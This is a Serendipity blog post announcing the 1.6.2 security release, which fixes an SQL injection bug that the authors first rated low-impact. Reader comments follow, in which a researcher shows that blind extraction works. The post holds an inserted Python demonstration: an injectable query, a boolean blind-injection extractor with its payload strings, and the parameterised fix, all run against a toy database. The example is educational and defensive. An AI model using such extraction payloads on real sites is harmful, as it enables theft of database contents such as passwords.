Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in pairs, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). The issue was reported to us today at 11:27, and we are happy to provide a quick fix for it.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/ (diff on github).

The error is that a request parameter is not properly validated before it is used in a SQL query, so that (when magic_quotes_gpc is off) SQL code can be injected into that query. We originally rated the impact as low, because our DB layer does not execute multiple statements and the result of the affected query is never used to produce output. Thanks to Pawel Golen it became clear that the issue can nonetheless be used to read the database remotely through a blind SQL injection attack: each injected condition only tells the attacker whether it was true or false, so reconstructing content takes a large number of queries and produces a lot of traffic, but it does work. You should therefore definitely upgrade your installation.
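To make concrete why "the query result is never output" does not protect against blind injection, here is an added example; it is not Serendipity's code, and the table names, the handler, the observable side effect and the payload format are hypothetical (SQLite stands in for MySQL, so the string functions differ from what a real attack against MySQL would use). The vulnerable handler interpolates a request value into the SQL string, as PHP code relying on magic_quotes_gpc would; the only thing the attacker can observe is whether the UPDATE matched a row. `blind_extract` recovers a password using nothing but such yes/no answers, and the parameterised handler next to it is the fix.

```python
"""Boolean-based blind SQL injection against a query whose rows are never
output, plus the parameterised fix.  Added example with a hypothetical schema;
nothing here is taken from Serendipity."""
import sqlite3

SECRET = "s3cret"   # constructed value the attacker wants to recover


def make_db():
    """Constructed in-memory stand-in for the blog database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO authors VALUES (1, 'admin', ?)", (SECRET,))
    conn.execute("CREATE TABLE entries (id INTEGER, title TEXT, views INTEGER)")
    conn.execute("INSERT INTO entries VALUES (1, 'hello', 0)")
    return conn


def vulnerable_handler(conn, title):
    """Vulnerable: `title` is pasted into the SQL string without escaping
    (what happens in PHP with magic_quotes_gpc off and no manual escaping).
    Nothing the query returns is sent to the client; the attacker can only
    observe whether the UPDATE touched a row.  That is modelled here as the
    return value; in a real application it could be a changed counter, a
    different redirect, an error page or a timing difference."""
    cur = conn.execute(
        "UPDATE entries SET views = views + 1 WHERE title = '%s'" % title)
    return cur.rowcount > 0


def fixed_handler(conn, title):
    """Hardened: the value is bound as a parameter, so quotes in it are data,
    and the payload simply matches no row."""
    cur = conn.execute(
        "UPDATE entries SET views = views + 1 WHERE title = ?", (title,))
    return cur.rowcount > 0


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string `subquery` evaluates to, one yes/no answer at a time.
    Returns (recovered_string, number_of_queries_used).  The payload closes
    the quoted string, appends a condition, and comments out the rest."""
    queries = 0
    recovered = ""
    for pos in range(1, max_len + 1):
        queries += 1
        # Is there a character at this position at all?
        if not oracle(f"hello' AND length(({subquery})) >= {pos} -- "):
            break
        # Binary search the code point in 0..127: seven questions per character.
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(f"hello' AND unicode(substr(({subquery}),{pos},1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, queries


def attack(handler):
    """Run the extraction against a fresh database through the given handler."""
    conn = make_db()
    return blind_extract(lambda payload: handler(conn, payload),
                         "SELECT password FROM authors WHERE id = 1")


if __name__ == "__main__":
    print("vulnerable:", attack(vulnerable_handler))   # ('s3cret', 49)
    print("fixed:     ", attack(fixed_handler))        # ('', 1)
```

The query count is what the post is getting at: seven probes for the length plus seven per character, 49 requests for a six-character value, and proportionally more for a whole table. It is slow and noisy, but it needs neither stacked statements nor any row of output, which is why those two properties did not make the bug harmless.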

Serendipity is an open-source product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others in the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.





Pawel Golen:

I can't agree with this risk rating. Blind sql injection can be used in this case to extract database content. I've checked it and it works like a charm.

ahappycustomer:

Now I am happy that I run a 4-year-old version of s9y that is not affected by this bug. Thank you so much for s9y, I'm a very happy "customer" :)

And yes, I know that 1.3 has had security issues since then, but those are all limited to weird extensions or to being an admin, if I'm not missing anything.
So thanks again, this proves so much how s9y is superior to WordPress when it comes to security.

Garvin:

Hi Pawel! Can you explain how you achieve that? The query is only executed, and no returned data is passed along to the output, so I don't exactly see how this can be used. I am not a SQL security expert, so if you can explain the situation, of course I would raise the risk assessment in that case!

Thanks for your input,

Pawel Golen:

I've sent you an email at blog@... with details. I hope you got it.

Garvin:

Thanks a lot for your specific email, now I see a lot clearer and have changed this blog text accordingly.
